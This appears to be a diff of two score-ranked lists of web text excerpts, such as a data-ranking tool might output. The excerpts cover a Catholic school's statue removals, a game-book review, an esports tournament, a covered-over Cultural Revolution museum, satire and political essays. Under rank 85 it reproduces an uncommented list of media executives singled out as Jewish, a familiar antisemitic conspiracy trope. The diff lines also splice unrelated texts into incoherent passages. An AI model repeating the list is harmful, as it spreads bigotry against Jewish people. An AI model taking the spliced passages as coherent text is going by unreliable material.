Center.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 84; Score = 4030464.0 -<|begin_of_text|>In the unattainable quest for leftist-deemed inclusivity, a Catholic school in California is purging itself of all remnants of Catholicism, including a statue of baby Jesus and the Virgin Mary. - -On Thursday, Marinij.com reported that San Domenico School in San Anselmo, California, had removed and relocated a number of Catholic statues in order to be more inclusive of other religions, sparking strong reactions from parents of students who attend the allegedly Catholic school. +Rank = 85; Score = 2146304.0 +<|begin_of_text|>MORTIMER ZUCKERMAN, owner of NY Daily News, US News & World Report and chair of the Conference of Presidents of Major Jewish American Organizations, one of the largest pro-Israel lobbying groups. LESLIE MOONVES, president of CBS television, great-nephew of David Ben-Gurion, and co-chair with Norman Ornstein of the Advisory Committee on Public Interest Obligation of Digital TV Producers, appointed by Clinton. JONATHAN MILLER, chair and CEO of AOL division of AOL-Time-Warner NEIL SHAPIRO, president of NBC News JEFF GASPIN, Executive Vice-President, Programming, NBC DAVID WESTIN, president of ABC News SUMNER REDSTONE, CEO of Viacom, "world's biggest media giant" (Economist, 11/23/2) owns Viacom cable, CBS and MTVs all over the world, Blockbuster video rentals and Black Entertainment TV. MICHAEL EISNER, major owner of Walt Disney, Capitol Cities, ABC. RUPERT MURDOCH, Owner Fox TV, New York Post, London Times, News of the World (Jewish mother) MEL KARMAZIN, president of CBS DON HEWITT, Exec. Director, 60 Minutes, CBS JEFF FAGER, Exec. Director, 60 Minutes II. CBS DAVID POLTRACK, Executive Vice-President, Research and Planning, CBS SANDY KRUSHOW, Chair, Fox Entertainment LLOYD BRAUN, Chair, ABC Entertainment BARRY MEYER, chair, Warner Bros. SHERRY LANSING. President of Paramount Communications and Chairman of Paramount Pictures' Motion Picture Group. HARVEY WEINSTEIN, CEO. Miramax Films. BRAD SIEGEL., President, Turner Entertainment. PETER CHERNIN, second in-command at Rupert Murdoch's News. Corp., owner of Fox TV MARTY PERETZ, owner and publisher of the New Republic, which openly identifies itself as pro-Israel. Al Gore credits Marty with being his "mentor." ARTHUR O. SULZBERGER, JR., publisher of the NY Times, the Boston Globe and other publications. WILLIAM SAFIRE, syndicated columnist for the NYT. TOM FRIEDMAN, syndicated columnist for the NYT. CHARLES KRAUTHAMMER, syndicated columnist for the Washington Post. Honored by Honest Reporting.com, website monitoring "anti-Israel media." RICHARD COHEN, syndicated +================================================================================ +Rank = 86; Score = 2146304.0 +<|begin_of_text|>Stone tablets and memorial archways displayed at a museum dedicated to the victims of the Cultural Revolution (1966-76) in Shantou, South China's Guangdong Province have been covered by cement. -Thus far, the school has removed and relocated all but 18 of their 180 Catholic icons and statues. The head of the school's board of trustees, Amy Skewes-Cox, claims such removals are “completely in compliance” with school rules, which were approved by the board and the Dominican Sisters of San Rafael last year. +Several exhibition halls at the museum - located on Tashan Mountain in Shantou's Chenghai district - were adapted for other purposes, and all the stone tablets, memorial gateways and victims' tombs at the site were covered with cement, Hong Kong-based news site hkej.com reported Wednesday. -Kim Pipki, whose daughter used to attend San Domenico, recalled the removal of the statue of baby Jesus and Mary as particularly contentious. +Peng Qi'an, founder of the museum and former vice mayor of Shantou, told the Global Times on Thursday that he had not entered the museum since its exhibits were covered. -“The one main statue that has everyone fired up is the baby Jesus and Mary one,” said Pipki. “It was at the center of the primary school courtyard.” +"Since March, the materials [in the museum] had been covered by banners with core socialist values slogans. Then they were covered by cement, making them illegible," Peng told the Global Times. -“It was less about God and more about passing on some traditions,” the mother noted. “People were shocked that the statues were pitched in the basement.” +When contacted by the Global Times for comment, an employee of the Chenghai district's publicity department said that she was unaware of the move. Shantou's publicity department was unable to be reached for comment as of press time. -Shannon Fitzpatrick, whose eight-year-old daughter currently attends Domenico, wrote an email to school officials and the Dominican Sisters of San Rafael expressing her disapproval of the so-called inclusive changes, suggesting their version of "inclusion" apparently means gutting Catholicism from the school altogether. +A report published by Hong Kong's Ming Pao newspaper in May said signs showing the way to the museum had been covered with banners extolling the core socialist values and emblazoned with the Chinese national flag and the Party emblem. -“Articulating an inclusive foundation appears to mean letting go of San Domenico’s 167-year tradition as a Dominican Catholic school and being both afraid and ashamed to celebrate one’s heritage and beliefs,” wrote Fitzpatrick. +A 20-meter-wide and 5-meter-high stone tablet in the museum's public square that was originally inscribed with the phrase "Take history as a mirror, do not let the tragedy of the Cultural Revolution repeat itself" had been replaced with enormous posters advocating the Chinese dream and core socialist values, the report added. -“In our time here, the word ‘Catholic’ has been removed from the mission statement, sacraments were removed from the curriculum, the lower school curriculum was changed to world religions, the logo and colors were changed to be ‘less Catholic,’ and the uniform was changed to be less Catholic," she continued. +Peng began developing the site in the late 1990s, and construction of the museum was completed in 2005. The area is dotted with dozens of graves, memorial arches and marble memorials carved with passages from history texts that describe class struggle or violent deaths. -The mother said she first became alarmed by the school's changes last year, when San Domenico removed “first reconciliation and first communion from the second-grade curriculum." +According to previous reports, it is allegedly China's only museum dedicated to the Cultural Revolution, and the local government neither supported nor opposed its construction. -In a follow-up email, Fitzpatrick noted that she was not the only parent disturbed by the "inclusive" changes. +Historians trace the start of the Cultural Revolution to May 16, 1966, when a conference of the Political Bureau of the Central Committee of the Communist Party of China (CPC) passed a circular in which Party leader Mao Zedong stated his belief that the power usurped by capitalist-roaders could be recaptured only by carrying out a great cultural revolution. -“There are other families having the same concerns I do. Many parents feel if the school is heading in a different direction then the San Domenico community should +The notice marks the beginning of a decade-long campaign that some historians ================================================================================ -Rank = 85; Score = 4014080.0 -<|begin_of_text|>This book has gotten a lot of flack for two reasons: (1) A number of people were upset by the large amount of errata posted after the book came out. (2) A number of people were upset by the perceived power-creep that this book carried with it, especially in the archetype section. +Rank = 87; Score = 2146304.0 +<|begin_of_text|>Ravers were left shocked at Corsica Studios this week after a local techno DJ spontaneously combusted with rage after a member of the crowd referred to his set as ‘Tech-House’. -Both of these are reasonable complaints that I largely agree with. +The DJ, whose name was later revealed to be Dave Lester, 32, from Lewisham, had been playing a sub-standard selection of repetitive tunes when a member of the crowd proceeded to the DJ booth. The crowd member was then seen talking into Lester’s ear, at which point the convulsions began at once. -That said, this book also contains a cornucopia of player options that are great fun. A number of the classes it introduced are now mainstream: it’s hard to imagine playing the game without options like the Brawler, the Investigator, the Slayer, the Bloodrager, the Hunter, or the Warpriest. Or to play without archetypes like the Bolt Ace (Gunslinger), Mutation Warrior or Martial Master (Fighter). +“He started shaking uncontrollably straight away,” crowd member Jody Smith told us afterwards. “If I heard correctly, the dude leaned over and said to him, ‘I’m really enjoying your selection: top tech-house music.’ Then the DJ’s mouth started frothing with blood and foam, his eyes seemed to pop out of their sockets with anger, and his fists clenched as if he had suddenly become some hideous techno version of the Incredible Hulk. He then collapsed twitching onto the floor, screaming in a blood-curdling voice the words ‘Jeff Mills is not Tech-House!’ over and over again.” -Moreover, the book introduced a number of feats that improve on the available build options available to most players (Extra Hex! Slashing Grace!). Likewise, although the spells in this book seem to have flown under the radar, there are a lot of nice and interesting spells are introduced in this book (Glue Seal, Communal Align Weapon, Wall of Blindness/Deafness, Wall of Nausea, Anti-Incorporeal Shell, Adjustable Disguise, Adjustable Polymorph, Investigative Mind, etc). +As the convulsions continued, onlooker Andrew Harris, who later identified himself as a friend of the deceased, was one of the first on the scene. -Easily 5 stars worth of good material here. Given the unusually large amount of errata, I feel compelled to deduct a star. But all that said, it’s hard to imagine playing Pathfinder without this book -- after the Core Rulebook and Advanced Players Guide, it’s probably the best book for players to pick up.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 86; Score = 4014080.0 -<|begin_of_text|>SETT TV Profile Joined January 2011 77 Posts Last Edited: 2013-07-26 17:53:09 #1 +“The sound technician has already jumped in and begun to administer CPR,” Harris told us, “but Dave simply squealed that the pumps to his chest were not being delivered in four to the floor time and physically threw him to one side. The sound technician responded by observing the fact that a techno tempo is too slow for effective CPR. It was at that point Dave simply exploded all over the concerned onlookers and over the decks.” -ASUS ROG releases the rules, map pool and the groups which start off the ASUS ROG Summer 2013 StarCraft II tournament in Helsinki August 1-3. +Lester was taken to hospital immediately afterwards, but was confirmed dead upon arrival. Doctors issued the following statement: “We’ve known about this condition, known in the medical journals as Techno Snobbery, for some time now, but this is the first time that we’ve ever seen anyone spontaneously combust with rage due to it. -It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. +“We would offer the following advice to techno DJs,” the statement continued. “Techno Snobbery is a condition that can often show no symptoms for many years, yet it has been documented that it can emerge suddenly at any time due to the slightest provocation. Therefore, techno DJs should remember that genre categorisations are largely permeable and superfluous, and that a fan referring to their music as Tech-House is therefore not a derogatory comment and can, in some circumstances +================================================================================ +Rank = 88; Score = 2129920.0 +<|begin_of_text|>Amir has also been ordered to not stare soulfully at cameras anymore © AFP -It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. Replacements +Following criticism of Mohammad Amir's early return to cricket after his spot-fixing ban, the ICC today announced the left-arm quick would only be allowed to bowl right-arm offspin in a long-sleeved top so "no one can ever forget he's a bit shifty". -It is very unfortunate, but there have been more cancellations this week as Evil Geniuses.Jaedong, +There had been fears letting Amir back ahead of schedule sent a message his past behaviour was completely forgiven, but this latest sanction, the ICC believes, will ensure the Pakistani youngster will continue to be widely stigmatised because, in the words of one Dubai official, "everyone knows what these offspinners get up to". -Evil Geniuses.Suppy, Millenium.ForGG, and are unable to attend the event. +Speaking outside the Indian Supreme Court, Head of the ICC Ethics Enforcement Unit, N Srinivasan, explained the idea: ''A lot of people were a bit miffed at us letting Amir come back early, so we decided to add an extra punishment to guarantee no one will ever, ever consider him above suspicion. We couldn't think of anything more likely to ruin his reputation in the current climate than forcing him to play as an offspinner. -However, despite the proximity of the event, we were able to get noteworthy replacements: Dignitas.TargA, +"Well, we were toying with the idea of making him India's overseas bowling coach, but in the end we decided even a convicted felon didn't deserve that." The deputy head of the ICC Ethics Enforcement Unit, N Srinivasan, claimed that this was in no way another clever ruse from the Big Three to prevent other countries from having any decent bowlers whatsoever: ''We haven't insisted Wayne Parnell becomes an offspinner, have we?'' he argued convincingly. -NaVi.BabyKnight, prOperty.RunA, and will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time so that the tournament could retain its high standards. +Amir himself was understandably upset about the plan, taking to social media to suggest the shame of being imprisoned for spot-fixing was nothing compared to the disgrace of having to bowl offspin in 2015. After listing his profile location as "a small village", the fallen idol sent out a number of distraught tweets claiming he "couldn't stand all the whispering and finger-pointing'' to which he'd be subjected if he was forced to send down the same category of delivery as Mohammad Hafeez and Saeed Ajmal. Later he wrote: "It's one thing to be hated for deliberately conceding a no-ball and shattering the dreams of millions of cricket fans across the world. It's quite another to suffer the humiliation of having a portly man in an ill-fitting umpire's uniform declare your arm is a bit too bendy." New to Twitter, Amir eventually realised the +================================================================================ +Rank = 89; Score = 2129920.0 +<|begin_of_text|>Janice Fiamengo by -It is very unfortunate, but there have been more cancellations this week as Alliance.NaNiwa and Fnatic.NightEnD are unable to attend the event.However, despite the proximity of the event, we were able to get noteworthy replacements: Fnatic.Naama and Bischu will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time +T + +he election of Donald J. Trump revealed a bitterly divided nation and a large body of voters fed up with the status quo: fed up with a perennially ailing economy and a shrinking middle class; fed up with an overly intrusive state that crippled businesses with innumerable regulations and sought to redistribute wealth; fed up with a massively burdensome and insupportable debt; fed up with a president mentored by revolutionaries and malcontents who seemed not to like ordinary Americans much if at all; fed up with a leader who paid court to hostile foreign powers while alienating or outright betraying America's traditional allies; fed up with a president who spoke of heartland Americans as bitter people who cling to their guns or religion or bigotry; fed up with a president who told business owners "You didn't build that," called the Fort Hood terrorist attack an episode of workplace violence, and announced at the United Nations that the future must not belong to those who slander the prophet of Islam; and most of all, perhaps, fed up with an administration that placed the whole country in thrall to political correctness, making a range of important subjects off-limits for discussion on pain of job loss or public disgrace. Many of these voters felt that America had changed beyond all recognition, had lost its core values, and that neither Republican nor Democrat politicians offered any real resistance to that, or even seemed to notice.Donald Trump promised to change everything: to make America great again; to revive American industry; to put Americans back to work and make it possible for them to feed their families and to have prosperity once again; to reduce burdensome taxes and over-regulation of businesses; to renew American patriotism and the traditional family; to stop pretending that children do just as well without a father and money; to stop pretending that masculinity is toxic; to make it acceptable and normal once more to love God and to celebrate America's Judeo-Christian heritage; to decrease the mass immigration that is changing the face of America for the worse; to root out the Muslim Brotherhood sympathizers who have been given key positions in the American administration; to halt illegal immigration and to put a stop to the sanctuary cities that make a mockery of American laws; to rebuild the American military and to signal American power, not acquiescence, to America's foes; to honor American veterans in a manner appropriate to their service; to renew ties with America's traditional allies; and to vigorously protect America from domestic and foreign terrorism. Perhaps most importantly, he promised to make ================================================================================ -Rank = 87; Score = 3997696.0 -<|begin_of_text|>Stone tablets and memorial archways displayed at a museum dedicated to the victims of the Cultural Revolution (1966-76) in Shantou, South China's Guangdong Province have been covered by cement. +Rank = 90; Score = 2113536.0 +<|begin_of_text|>Attorney General Jeff Sessions said Tuesday that his Justice Department will enter the legal fight over free speech on college campuses, as he delivered a blistering speech at Georgetown University Law Center declaring freedom of thought and speech is “under attack.” -Several exhibition halls at the museum - located on Tashan Mountain in Shantou's Chenghai district - were adapted for other purposes, and all the stone tablets, memorial gateways and victims' tombs at the site were covered with cement, Hong Kong-based news site hkej.com reported Wednesday. +“Starting today, the Department of Justice will do its part in this struggle. We will enforce federal law, defend free speech, and protect students’ free expression from whatever end of the political spectrum it may come,” Sessions told an audience of Georgetown students. -Peng Qi'an, founder of the museum and former vice mayor of Shantou, told the Global Times on Thursday that he had not entered the museum since its exhibits were covered. +The speech marked the attorney general's entry into a raging national debate, largely over protesters effectively shutting down conservative speakers on American campuses. -"Since March, the materials [in the museum] had been covered by banners with core socialist values slogans. Then they were covered by cement, making them illegible," Peng told the Global Times. +During his remarks at Georgetown’s Constitution Center, the Justice Department simultaneously filed a statement of interest in a free-speech case siding with students who said their rights were limited. -When contacted by the Global Times for comment, an employee of the Chenghai district's publicity department said that she was unaware of the move. Shantou's publicity department was unable to be reached for comment as of press time. +“We will be filing more in the weeks and months to come,” Sessions said. -A report published by Hong Kong's Ming Pao newspaper in May said signs showing the way to the museum had been covered with banners extolling the core socialist values and emblazoned with the Chinese national flag and the Party emblem. +The case cited Tuesday was initially filed by students at Georgia Gwinnett College to challenge a policy limiting student expressive activity to two small “free-speech zones.” -A 20-meter-wide and 5-meter-high stone tablet in the museum's public square that was originally inscribed with the phrase "Take history as a mirror, do not let the tragedy of the Cultural Revolution repeat itself" had been replaced with enormous posters advocating the Chinese dream and core socialist values, the report added. +The Justice Department argued that the college’s speech policies were not content-neutral and were not “narrowly tailored to achieve a compelling government interest.” -Peng began developing the site in the late 1990s, and construction of the museum was completed in 2005. The area is dotted with dozens of graves, memorial arches and marble memorials carved with passages from history texts that describe class struggle or violent deaths. +“A national recommitment to free speech on campus and to ensuring First Amendment rights is long overdue,” Sessions said. -According to previous reports, it is allegedly China's only museum dedicated to the Cultural Revolution, and the local government neither supported nor opposed its construction. +Ahead of Sessions' address, a group of more than 30 Georgetown law professors signed onto a letter condemning what they called “the hypocrisy” of Sessions' appearance. They cited President Trump's ongoing feud with NFL players who kneel during the anthem and other complaints about Sessions' DOJ. -Historians trace the start of the Cultural Revolution to May 16, 1966, when a conference of the Political Bureau of the Central Committee of the Communist Party of China (CPC) passed a circular in which Party leader Mao Zedong stated his belief that the power usurped by capitalist-roaders could be recaptured only by carrying out a great cultural revolution. +“Attorney General Jeff Sessions is a key cabinet member in an administration headed by a President who spent last weekend denouncing athletes engaged in free expression and calling for them to be fired,” the professors wrote Monday night. -The notice marks the beginning of a decade-long campaign that some historians -================================================================================ -Rank = 88; Score = 3948544.0 -<|begin_of_text|>All week, The Ringer will be celebrating Good Bad Movies, those films that are so terrible they’re endlessly amusing and — dare we say it? — actually good. Please join us as we give the over-the-top action movies, low-budget romance thrillers, and peak ’80s cheese-fests the spotlight they deserve. +The professors went on to cite other examples of why they think Sessions is unfit to deliver this address, including his department's prosecution of a protester who disrupted his confirmation hearings. -If we were to view all of the Good Bad Movies as parts and pieces that exist parallel to one another, adjacent to one another, in the same plane as one another, and they could snap together to form a kind of Good Bad Movie Universe, then who would be the actor who lorded over all of it? That’s a big question and a hard question because there are so, so, so many Good Bad Movies. But actually it’s a small question and an easy question because the answer is very clear: +In the question-and-answer exchange after Sessions’ remarks, the attorney general defended the president’s “free speech rights.” -Nicolas Cage has acted in more than 80 movies during his career. Mind you, not all of them are Good Bad Movies. That is not the argument here; the quality of his movies covers a wide, big, broad range. Some of them are Actually Good Movies, some of them are Good Bad Movies, some of them are Bad Movies, some of them are Bad Good Movies, some of them are Bad Bad Movies, and some of them fall in the cracks between those categories. So no, the argument is not that every Nicolas Cage movie is a Good Bad Movie. The argument is that, in total, Nicolas Cage is the King of the Good Bad Movie Universe. +“The president has free speech rights too. He sends soldiers out every day to defend this country, under the flag of the United States, under the national anthem,” Sessions said. “I agree there is a big mistake to protest in that fashion because it weakens the commitment we have to this nation that has provided us this freedom.” -Question: How does one become the King of the Good Bad Movie Universe, or even qualify for the title? +Sessions added that while the players obviously are not subject to prosecution, they should be prepared to be condemned if they pursue a “provocative act.” -Answer: In a previous article, the requirements for a Good Bad Movie were laid out as such: +But +================================================================================ +Rank = 91; Score = 2097152.0 +<|begin_of_text|>The Move From Large Size Dollars To Small Sized Dollars - From Concept To Reality - A Brief History Of The United States Small Dollar - The Dollar Coin has been the main staple of the United States' monetary system since it was authorized by Congress on April 2, 1792 and first struck in 1794. Even though it was large in size (38.1 to 40 mm), it was a popular denomination and circulated well due to its buying power. The "silver dollar" was discontinued in 1935. By the mid to late 1960's, the price of silver rose to the point that "silver dollars" no longer circulated. In 1971, due to the needs of gambling casinos for a dollar coin, and the public's desire to honor the first landing on the moon, the dollar coin was again struck, i.e. the Eisenhower Dollar. The coins failed to circulate widely, primarily due to their large size and the acceptance and convenience of the paper dollar. -Enjoyment of the movie must be derived from its badness. Its badness needs to be the thing that creates a sense of bewildered enjoyment. +SIDE-BY-SIDE SIZE COMPARISON OF AN EISENHOWER -There must be a pervading sense that those who made the film thought what they were doing was great or at least good. Good Bad Movies have minimal self-awareness. Here are two examples that may help explain this sentiment: 1) MacGruber is not a Good Bad Movie, it’s a tribute to Good Bad Movies, and 2) Fast Five is not a Good Bad Movie, it is a movie that intentionally wades into ridiculousness (and then manufactures a reaction similar to the one a Good Bad Movie elicits naturally). +DOLLAR (38.1 mm) AND A SUSAN B. ANTHONY DOLLAR (26.5 mm) -The movie must have been something of a critical failure when it was released. Critics, god bless them, hold movies +PHOTO COURTESY OF ROBERT EZERMAN In the mid 1970's, attention turned to a smaller size dollar coin, culminating in the Susan B. Anthony Dollar in 1979. Miss Anthony was chosen to honor her life long fight for women's suffrage. From day one the Anthony Dollar was rejected and ridiculed. The portrait was considered ugly and the coins were not easily distinguished from the quarter dollar. Besides being the same color, there was less than nine-hundredths of an inch difference in the diameters of the Anthony Dollar and the quarter dollar. They were given nicknames such as "Agony Dollars", "Carter Quarters", "Susan B. Edsel", and "JC Pennies" (Jimmy Carter was in the White House at the time). They were discontinued at that time after only being struck for circulation for two years, 1979 and 1980. The 1981 Anthony Dollars were struck for mint sets only. Curiously, this was not the first time this criticism was accorded a United States coin. In 1875 a Twenty-Cent piece was struck. Besides having virtually the same design as the quarter dollar, it was a mere eight-hundredths of an inch smaller. The Twenty-Cent piece ceased being struck for circulation in 1876 ================================================================================ -Rank = 89; Score = 3948544.0 -<|begin_of_text|>Ravers were left shocked at Corsica Studios this week after a local techno DJ spontaneously combusted with rage after a member of the crowd referred to his set as ‘Tech-House’. +Rank = 92; Score = 2080768.0 +<|begin_of_text|>The great comedian Milton Berle had a powerful put-down for the many acts that auditioned for his show but failed to make the grade. “High school,” he’d call them. And I can’t think of a better term to describe the Conservative campaign brain trust at the midpoint of this long election season. -The DJ, whose name was later revealed to be Dave Lester, 32, from Lewisham, had been playing a sub-standard selection of repetitive tunes when a member of the crowd proceeded to the DJ booth. The crowd member was then seen talking into Lester’s ear, at which point the convulsions began at once. +Just lately, for example, the campaign seems to be having a tiny problem with geography. Last Friday, a Harper tweet provided a lovely snapshot of Little Crater Lake in the state of Oregon to illustrate its commitment to the Canadian great outdoors. Earlier in the week, a campaign spot talked about shipbuilding in Halifax, N.S. … against a backdrop of Johnstown, Ont. A group of Colombian miners sat in for a party ad promoting a mineral exploration tax credit. And then there was the Tory ad which misidentified a B.C. salmon as its Atlantic cousin — the online trolls are still chuckling over that one. -“He started shaking uncontrollably straight away,” crowd member Jody Smith told us afterwards. “If I heard correctly, the dude leaned over and said to him, ‘I’m really enjoying your selection: top tech-house music.’ Then the DJ’s mouth started frothing with blood and foam, his eyes seemed to pop out of their sockets with anger, and his fists clenched as if he had suddenly become some hideous techno version of the Incredible Hulk. He then collapsed twitching onto the floor, screaming in a blood-curdling voice the words ‘Jeff Mills is not Tech-House!’ over and over again.” +Well, these things happen. So do things like a sudden drop in the polls to third place. If that’s not a wakeup call, I don’t know what qualifies. -As the convulsions continued, onlooker Andrew Harris, who later identified himself as a friend of the deceased, was one of the first on the scene. +It all made me think of an incident in the 2000 campaign, when Canadian Alliance Leader Stockwell Day lamented that Canadian talent and brains were heading south to the U.S., “just like the Niagara River.” The message was sound, the words were not; the Niagara actually flows northward. -“The sound technician has already jumped in and begun to administer CPR,” Harris told us, “but Dave simply squealed that the pumps to his chest were not being delivered in four to the floor time and physically threw him to one side. The sound technician responded by observing the fact that a techno tempo is too slow for effective CPR. It was at that point Dave simply exploded all over the concerned onlookers and over the decks.” +Day took a lot of ungentle ribbing for that error — but his mistakes fade in comparison to the fiasco in the Big Blue Bus these days. There’s one common thread that links Day’s experience in 2000 to what Harper is going through right now: a profound sense of confusion on the ground. But that’s where the similarities end. -Lester was taken to hospital immediately afterwards, but was confirmed dead upon arrival. Doctors issued the following statement: “We’ve known about this condition, known in the medical journals as Techno Snobbery, for some time now, but this is the first time that we’ve ever seen anyone spontaneously combust with rage due to it. +I worked on the Day campaign as legislative assistant to a front-bench MP. For the Alliance, the 2000 election was an unwelcome surprise from PM Jean Chretien, who always knew how to catch his opponents off guard. The CA had just been through a highly divisive leadership campaign 